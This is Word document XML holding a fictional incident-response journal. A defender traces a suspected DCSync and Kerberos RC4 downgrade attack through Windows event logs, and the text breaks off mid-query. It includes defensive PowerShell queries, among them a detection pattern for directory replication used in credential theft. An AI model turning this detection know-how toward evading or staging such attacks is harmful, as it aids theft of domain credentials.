    <w:p w14:paraId="1BDB42E3" w14:textId="0080F024" w:rsidR="004068EE" w:rsidRPr="00DE6295" w:rsidRDefault="004068EE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6295">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defender’s Journal Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489CE224" w14:textId="5202D98C" w:rsidR="004068EE" w:rsidRDefault="004068EE">
      <w:r>
        <w:t>Something’s off. Again. I can’t put my finger on it yet, but my gut</w:t>
      </w:r>
      <w:r w:rsidR="00CE6E70">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is screaming and is giving me the worst BGs. When my intuition is trying to tell me something is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">really </w:t>
      </w:r>
      <w:r>
        <w:t>off, I get BGs. Thank god for Pepto…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2842D8B1" w14:textId="3EB03AC2" w:rsidR="004068EE" w:rsidRDefault="004068EE">
      <w:r>
        <w:t xml:space="preserve">I was reviewing Splunk dashboards over a café latte – yeah, I know, glamorous Saturday morning – and noticed a blip. Event ID 4624 (successful logon) from </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WS-ACCT-047</w:t>
      </w:r>
      <w:r>
        <w:t>, an accounting workstation, at 0347 this morning. Logon Type 3, network logon, from an internal IP I do not immediately recognize. Not unusual by itself. But then I cross-referenced with our EDR telemetry and saw something that made me almost choke on that last sip of café latte I took:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09824BDB" w14:textId="5BD91BE6" w:rsidR="004068EE" w:rsidRDefault="004068EE">
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>powershell.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> spawned </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>rundll32.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with a command line containing a suspicious GUID. Then </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>rundll32.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> injected</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve"> itself</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into another process. Then… nothing. The process tree just stops. No child processes. No network connections. No file writes. What the fu…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108EE748" w14:textId="3FB3CCB5" w:rsidR="004068EE" w:rsidRDefault="004068EE">
      <w:r>
        <w:t>If I recall correctly from my most recent enterprise defender training, that’s a reflective DLL injection. Or quite possibly a .NET assembly loading</w:t>
      </w:r>
      <w:r w:rsidR="001C3C09">
        <w:t>, which are harmless for the most part; however, it is something that never touches disk…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEDAAD5" w14:textId="7D691FB1" w:rsidR="001C3C09" w:rsidRDefault="001C3C09">
      <w:r>
        <w:t xml:space="preserve">I pulled the EDRs memory scan for that host. Clean. </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>Just my luck. Of course,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>t’s clean</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>. No trace of anything. No sign. No remnant. Just. Nothing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – if the payload was purely in-memory and the beacon self-terminated, there’s nothing on disk to find! But the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">behavior </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is here (and so is my upset stomach). Someone was </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that box, I know it, and the</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>ir operational security (OPSEC) is high – they’re exercising extreme caution and being ex</w:t>
      </w:r>
      <w:r>
        <w:t>tremely careful not to get caught.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488B9867" w14:textId="06D57FE4" w:rsidR="001C3C09" w:rsidRDefault="001C3C09">
      <w:r>
        <w:t xml:space="preserve">I need to know exactly what the hell they did. The stupid EDR doesn’t capture full command lines for in-memory executions – just the initial process creation. </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>So,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I’m going straight to the source: Windows Event Logs on the DC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CCB73B" w14:textId="226426C3" w:rsidR="001C3C09" w:rsidRDefault="001C3C09">
      <w:r>
        <w:t>I ran a quick PowerShell query against our central log collector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7FF413" w14:textId="77777777" w:rsidR="00A40F32" w:rsidRDefault="00A40F32">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Get-WinEvent -FilterHashtable @{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>LogName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>'Security'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve">=4662; StartTime=(Get-Date).AddHours(-6)} | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>Where-Object {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve">.Message -match </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>"Replicating Directory Changes"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve">} | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>Select-Object TimeCreated, @{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>'Account'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>;E={</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>.Properties[1].Value}}, @{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>'Object'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>;E={</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>.Properties[6].Value}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E9489E" w14:textId="1A476A92" w:rsidR="001C3C09" w:rsidRDefault="001C3C09" w:rsidP="001C3C09">
      <w:r>
        <w:t>Again. Nothing. Absolutely. Nothing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF3CC82" w14:textId="6BE0F359" w:rsidR="001C3C09" w:rsidRDefault="001C3C09" w:rsidP="001C3C09">
      <w:r>
        <w:t xml:space="preserve">That’s… that’s not right. We </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be logging </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve">for ID </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4662 </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>that will provide me the exact</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directory replication access. It is a critical control for detecting DCSync attacks. I checked the domain controller’s audit policy via GPO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A45F8A" w14:textId="2FE49C56" w:rsidR="001C3C09" w:rsidRDefault="00A40F32" w:rsidP="00A40F32">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Computer Configuration &gt; Policies &gt; Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="397300"/>
        </w:rPr>
        <w:t xml:space="preserve"> Settings </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>&gt; Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="397300"/>
        </w:rPr>
        <w:t xml:space="preserve"> Settings </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>&gt; Advanced Audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="397300"/>
        </w:rPr>
        <w:t xml:space="preserve"> Policy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Configuration &gt; Audit Directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="397300"/>
        </w:rPr>
        <w:t xml:space="preserve"> Service </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11068CDB" w14:textId="2FDEAF22" w:rsidR="001C3C09" w:rsidRDefault="001C3C09" w:rsidP="001C3C09">
      <w:r>
        <w:t>It’s set to “No Auditing.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B586D5" w14:textId="34A75639" w:rsidR="001C3C09" w:rsidRDefault="001C3C09" w:rsidP="001C3C09">
      <w:r>
        <w:t>Are you f</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>reaking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kidding me?? We’re not auditing directory servi</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>e access on our Domain Controllers??? Who made that decision? Oh right – the previous admin</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve"> who thought it best </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:lastRenderedPageBreak/>
        <w:t>that the team “</w:t>
      </w:r>
      <w:r>
        <w:t>reduce log volume.” Great. We have a 12-year-old forest with no visibility into the single most dangerous operation an attacker can perform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3DBF1D" w14:textId="158BB5E3" w:rsidR="001C3C09" w:rsidRDefault="001C3C09" w:rsidP="001C3C09">
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>’ll have to just</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> re-enable it</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>, and then</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I will have to force th</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>is change</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to instantly propagate to all DCs by running this Group Policy update command that will force replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397587ED" w14:textId="6E017A1D" w:rsidR="001C3C09" w:rsidRDefault="00A40F32" w:rsidP="00A40F32">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve">gpupdate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
        </w:rPr>
        <w:t>/force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D15DA9" w14:textId="70A466D4" w:rsidR="001C3C09" w:rsidRDefault="001C3C09" w:rsidP="001C3C09">
      <w:r>
        <w:t>In the meantime, I</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t xml:space="preserve"> am going to </w:t>
      </w:r>
      <w:r>
        <w:t>pull every other log I can possibly find. I need to know if this was an unauthorized recon effort, or if they already got what they came for. And, if so… what was it, exactly?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2123BA" w14:textId="695E9543" w:rsidR="001C3C09" w:rsidRDefault="001C3C09" w:rsidP="001C3C09">
      <w:r>
        <w:t>I also checked BloodHound’s ingest history. Last run was… never… we don’t have BloodHound. We don’t even know our own attack paths. I’m a pilot flying blind in a forest full of tripwires I can’t even see!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1301E191" w14:textId="17B047DC" w:rsidR="001C3C09" w:rsidRDefault="001C3C09" w:rsidP="001C3C09">
      <w:r>
        <w:t>This is going to be one hell of a long day. Lucky me.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6BDBC1" w14:textId="5AC380B5" w:rsidR="001C3C09" w:rsidRPr="00A40F32" w:rsidRDefault="001C3C09" w:rsidP="001C3C09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 3 – 1034</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAF6D3A" w14:textId="36917F55" w:rsidR="001C3C09" w:rsidRPr="00A40F32" w:rsidRDefault="001C3C09" w:rsidP="001C3C09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defender’s Journal Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DA17F7" w14:textId="7EB1E412" w:rsidR="001C3C09" w:rsidRDefault="001C3C09" w:rsidP="001C3C09">
      <w:r>
        <w:t>I found it! Or rather, I found the absence of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FB138E" w14:textId="37129106" w:rsidR="001C3C09" w:rsidRDefault="001C3C09" w:rsidP="001C3C09">
      <w:r>
        <w:t xml:space="preserve">I was manually reviewing Event ID 5136 (Directory Service Changes) – which we </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> log, thank god for small mercies – looking for any anomalous modifications. Nothing suspicious there. But then I cross-referenced the timeline: at 0347, the same time as the anomalous logon on </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6295">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WS-ACCT-047</w:t>
      </w:r>
      <w:r>
        <w:t>, there was a burst of Event ID 4768 (Kerberos TGT requests) from that host. Normal, right? Workstation just authenticating and checking in with the DC like always…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B050D7C" w14:textId="22D9A3A3" w:rsidR="001C3C09" w:rsidRDefault="001C3C09" w:rsidP="001C3C09">
      <w:r>
        <w:t xml:space="preserve">But the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>encryption types</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> caught my eye. Three TGT requests in rapid succession</w:t>
      </w:r>
      <w:r w:rsidR="0015466A">
        <w:t>, and replication isn’t even that fast.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2322E163" w14:textId="2675A24E" w:rsidR="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">First: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6295">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>AES256-CTS-HMAC-SHA1-96 (etype 0x12)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – normal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133B9130" w14:textId="3A969311" w:rsidR="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Second: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6295">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>RC4-HMAC (etype 0x17)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – legacy, but not unheard of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9B4EDD" w14:textId="4D1D7654" w:rsidR="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Third: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6295">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>AES256-CTS-HMAC-SHA1-96</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1379653B" w14:textId="26868943" w:rsidR="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:r>
        <w:t xml:space="preserve">Why in the world would a workstation request RC4 specifically? Modern Windows defaults to AES…you have to literally </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>force</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RC4. And the account requesting it was </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6295">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D9CAF6" w14:textId="524C0AF8" w:rsidR="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:r>
        <w:t xml:space="preserve">Wait. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6295">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> isn’t even a user or machine account. It’s a </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>darn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> service account. Now, I’m 99.5% sure that we don’t have any services that should be pinging the DC for a TGT from an</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> accounting workstation out of all things at 3:47AM?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF4C334" w14:textId="6033DDF7" w:rsidR="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Someone harvested </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6295">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> credentials from that workstation, I bet. And then they used them. But for what?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108A0916" w14:textId="7E25D5EF" w:rsidR="0015466A" w:rsidRDefault="0015466A" w:rsidP="0015466A">
      <w:r>
        <w:t xml:space="preserve">I need to know what </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6295">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is capable of doing. I pulled the account’s permission sets from AD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B7BCA3" w14:textId="7F654192" w:rsidR="0015466A" w:rsidRPr="00853A1F" w:rsidRDefault="00A40F32" w:rsidP="00A40F32">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>-ACL "AD:\DC=corp,DC=target,DC=local").</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> {$_.IdentityReference -match "svc-backup"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t>ActiveDirectoryRights:ExtendedRight</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">ObjectType: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
